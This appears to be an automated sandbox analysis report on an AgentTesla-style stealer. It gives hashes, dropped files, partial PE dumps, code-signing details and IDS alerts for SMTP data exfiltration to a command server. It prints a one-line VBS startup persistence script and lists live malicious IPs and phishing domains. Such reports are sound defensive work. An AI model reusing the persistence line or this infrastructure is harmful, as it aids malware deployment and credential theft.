                                                                                                    Holiday#3021.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15
                                                                                                    Holiday#3021.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15
                                                                                                    Ref#103052.exeGet hashmaliciousXWormBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref#103052.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBMWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref#103052.exeGet hashmaliciousXWormBrowse
                                                                                                    • 194.15.112.248
                                                                                                    9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 194.15.112.248
                                                                                                    Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 194.15.112.248
                                                                                                    KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    CLOUDFLARENETUShttps://app-nadexlxogi.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                    • 172.64.151.8
                                                                                                    https://postaboutx.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 172.67.134.64
                                                                                                    https://informed.deliveryerz.top/us/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.16.40.28
                                                                                                    https://informed.deliveryelc.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.38.157
                                                                                                    https://informed.deliveryerw.top/us/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.16.41.28
                                                                                                    https://informed.deliveryekg.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.41.205
                                                                                                    https://informed.deliveryewo.top/us/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.21.32.1
                                                                                                    https://informed.deliveryele.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.20.172
                                                                                                    https://reserves-page.com/evquyjawGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.21.16.1
                                                                                                    https://jcard50.ru/eGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.112.1
                                                                                                    VIVIDHOSTINGUSVYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 162.254.34.31
                                                                                                    Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 162.254.34.31
                                                                                                    Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 162.254.34.31
                                                                                                    arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 192.154.238.20
                                                                                                    Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 162.254.34.31
                                                                                                    Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 162.254.34.31
                                                                                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                    • 162.254.34.31
                                                                                                    Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                    • 162.254.34.31
                                                                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 192.26.155.193
                                                                                                    Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 162.254.34.31

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://www.flndmy.er-xu.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://www.maps-s.xz-sr.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://www.support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://www.location.as-nt.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://findmy.cl-ew.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://www.maps.cx-vr.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://flndmy.ef-uc.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://www.support.av-ro.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205
                                                                                                    https://postaboutx.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    • 104.26.12.205

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    C:\Users\user\AppData\Local\Temp\ckuv.exeIMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      9876567899.bat.exeGet hashmaliciousLokibotBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\ckuv.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):57976
                                                                                                        Entropy (8bit):6.2713364951546815
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
                                                                                                        MD5:CDD3D1BB178C391A905C40D2B292F4D6
                                                                                                        SHA1:BF7FCE373510E8FAC054703F879C5AAC2E8ED584
                                                                                                        SHA-256:F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
                                                                                                        SHA-512:E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: IMG_10503677.exe, Detection: malicious, Browse
                                                                                                        • Filename: 9876567899.bat.exe, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]...........................................................*...(....*..(....&*.s....%(....(.....o....o....o....*....(....*.s....%(.....o....u....r...po....o....*...(....*.0..=.......s...........(....(.....o....u....rM..p(..........o....o.....*.....(....*.0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.......*..(....@.%e..........Ft........'.\.........(....*.0..

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84
                                                                                                        Entropy (8bit):4.748113447320966
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:FER/n0eFHHot+kiEaKC5rQBNiAHn:FER/lFHIwknaZ5rZAH
                                                                                                        MD5:C38762817E1E239233AD8F02D59515B6
                                                                                                        SHA1:8354C9FCBDBDED321BA3BE34F17EB23FC7F65F02
                                                                                                        SHA-256:5667F9CDEEDEA63F69C0A848AB6F0965708811717C31217168094FEB9CC79582
                                                                                                        SHA-512:43F57A2CF68D8110D8557D04A6EB55F5E34AB4713CD7AD179BF73E4224A28A5B4D69FB20D893860B1C4CF4C2AA3EEB314CE336C5D3F96426FAC9227008636575
                                                                                                        Malicious:true
                                                                                                        Reputation:low
                                                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ilsucsfth.exe"""

                                                                                                        C:\Users\user\AppData\Roaming\ilsucsfth.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):149112
                                                                                                        Entropy (8bit):5.570643969578104
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:xqvP1g8HjZfTiLX82GFmnGtGfIIcDjp31lDKqWIqHOVdh2iIC/m8:xqn1g8DNOM21nGtQdGNFlDKjId2pC/j
                                                                                                        MD5:9773F17F57D5A69D3A69EEC6DEF1A8A3
                                                                                                        SHA1:86E0269B21C64FFDC344EF0792FBAAAEB058D416
                                                                                                        SHA-256:37FBB8AAB11FEE86746DCA42F37CC3E1F8AF646D595CD292DC04963D9C82B89A
                                                                                                        SHA-512:147E647E91FFFB2FD3E674675B6D4EC50882696D517CF6F730136860F7C2FB9847B7CB0A7B4BE4F7A66BA9AD9484B0BF9430729604B720031EB0BF9ADC266788
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.g............................."... ...@....@.. ....................................`.................................."..K....@..................x....`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................."......H.......x................................................................*...(....*..(....*..0..t....... ........8........E........].......P.......l...........8.........(......r...po....rM..p(..........o....& ....~....{....:....& ....8....... ....8~...8d... ....8o...(....o.....=.... ....~....{....:K...& ....8@...(....u...... ....~....{....9 ...& ....8....*...ra..p(....o.... ....8........E....]...........-...8X.....o...... ....~....{....9....& ....8......r...p(....o.... ....~.

                                                                                                        C:\Users\user\AppData\Roaming\ilsucsfth.exe:Zone.Identifier

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):26
                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:true
                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):5.570643969578104
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:rCHARTERREQUEST.exe
                                                                                                        File size:149'112 bytes
                                                                                                        MD5:9773f17f57d5a69d3a69eec6def1a8a3
                                                                                                        SHA1:86e0269b21c64ffdc344ef0792fbaaaeb058d416
                                                                                                        SHA256:37fbb8aab11fee86746dca42f37cc3e1f8af646d595cd292dc04963d9c82b89a
                                                                                                        SHA512:147e647e91fffb2fd3e674675b6d4ec50882696d517cf6f730136860f7c2fb9847b7cb0a7b4be4f7a66ba9ad9484b0bf9430729604b720031eb0bf9adc266788
                                                                                                        SSDEEP:1536:xqvP1g8HjZfTiLX82GFmnGtGfIIcDjp31lDKqWIqHOVdh2iIC/m8:xqn1g8DNOM21nGtQdGNFlDKjId2pC/j
                                                                                                        TLSH:F4E3EC1AE3D1E8CFCC80767674A366173321AD82699FCD07AE5672CC1D723D269DB089
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.g............................."... ...@....@.. ....................................`................................

                                                                                                        File Icon

                                                                                                        Icon Hash:b04a484c4c4a4eb0

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4122de
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:true
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x678458DF [Mon Jan 13 00:05:51 2025 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                        Authenticode Signature

                                                                                                        Signature Valid:false
                                                                                                        Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                        Error Number:-2146869232
                                                                                                        Not Before, Not After
                                                                                                        • 19/10/2023 10:33:01 19/10/2024 10:33:01
                                                                                                        Subject Chain
                                                                                                        • CN=Helpfeel Inc, OU=\u958b\u767a\u90e8, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                                                                                                        Version:3
                                                                                                        Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                                                                                                        Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                                                                                                        Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                                                                                                        Serial:138A5335DB02BAFDC71DC47A

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x122900x4b.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x10ecc.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x218000x2e78.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x102e40x10400f72e02ebed08fab51d34a45fff13f126False0.46057692307692305data5.660164012913333IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x140000x10ecc0x110007b8f442061effa32a9830878bd64e184False0.056382123161764705data4.117083932059765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x260000xc0x200c08a04b58d4aac86ae9431d9698b341cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0x141300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046492369572932686
                                                                                                        RT_GROUP_ICON0x249580x14data1.15
                                                                                                        RT_VERSION0x2496c0x374data0.4230769230769231
                                                                                                        RT_MANIFEST0x24ce00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2025-01-13T03:00:53.548304+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449846162.254.34.31587TCP
                                                                                                        2025-01-13T03:00:53.548304+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449846162.254.34.31587TCP
                                                                                                        2025-01-13T03:01:28.202237+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449741162.254.34.31587TCP
                                                                                                        2025-01-13T03:01:28.202237+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449741162.254.34.31587TCP
                                                                                                        2025-01-13T03:01:30.505027+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:32.630461+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449743194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:34.306463+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449744194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:35.988758+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:37.695396+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449746194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:40.071454+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:41.764995+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449749194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:43.542118+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449750194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:45.247307+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449751194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:46.927249+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449752194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:49.213818+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:50.894839+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:53.708411+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:55.397476+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449756194.15.112.248443TCP
                                                                                                        2025-01-13T03:01:58.141399+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449758194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:00.202382+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449760194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:02.125316+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449766194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:04.913280+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449777194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:06.611159+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449795194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:09.179030+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449809194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:10.913892+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449820194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:13.499305+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449829194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:13.682447+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449741162.254.34.31587TCP
                                                                                                        2025-01-13T03:02:13.682447+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449741162.254.34.31587TCP
                                                                                                        2025-01-13T03:02:15.180541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449845194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:15.237440+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449846162.254.34.31587TCP
                                                                                                        2025-01-13T03:02:15.237440+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449846162.254.34.31587TCP
                                                                                                        2025-01-13T03:02:17.497559+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449857194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:19.212591+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449870194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:21.382837+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449884194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:23.257446+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449897194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:25.202950+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449913194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:27.125801+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449924194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:28.818368+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449935194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:30.513666+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449945194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:33.450332+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449961194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:36.205624+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449977194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:37.912629+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449990194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:39.620276+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450004194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:41.812060+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450013194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:43.511777+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450029194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:45.191406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450040194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:46.908277+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450049194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:48.611890+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450050194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:50.887918+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450051194.15.112.248443TCP
                                                                                                        2025-01-13T03:02:52.584909+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450052194.15.112.248443TCP
